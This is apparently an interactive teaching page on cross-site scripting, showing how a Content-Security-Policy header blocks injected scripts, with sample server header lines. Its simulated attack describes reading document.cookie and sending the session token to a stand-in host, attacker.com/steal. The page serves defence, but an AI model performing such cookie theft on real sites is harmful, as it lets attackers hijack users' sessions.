Without a Content-Security-Policy header, any injected script executes freely. One vulnerable comment field is all it takes.
XSS (Cross-Site Scripting) means an attacker gets their JavaScript to run on your page. This can happen through comment fields, search boxes, URL parameters, or any input that gets reflected back into the page.
Without CSP, the browser has no way to know which scripts are legitimate and which were injected by an attacker. It runs all of them. With CSP, the server tells the browser: "Only run scripts I explicitly approve." An injected <script> tag or onerror handler is blocked before it executes.
Try it: Type an XSS payload into the comment field below. Toggle between no-CSP and CSP modes to see the difference.
Content-Security-Policy header returnedadd_header Content-Security-Policy "default-src 'self'; script-src 'self'" always;Header always set Content-Security-Policy "default-src 'self'"Content-Security-Policy-Report-Only to audit before enforcing'unsafe-inline' which weakens CSPframe-ancestors 'self' to prevent clickjacking (replaces X-Frame-Options)stealCookies() was called. In a real attack this function would:
document.cookie → get the session tokenhttps://attacker.com/steal?c=SESSIONEvery student and teacher who loads this page would be affected — not just the person who submitted the comment.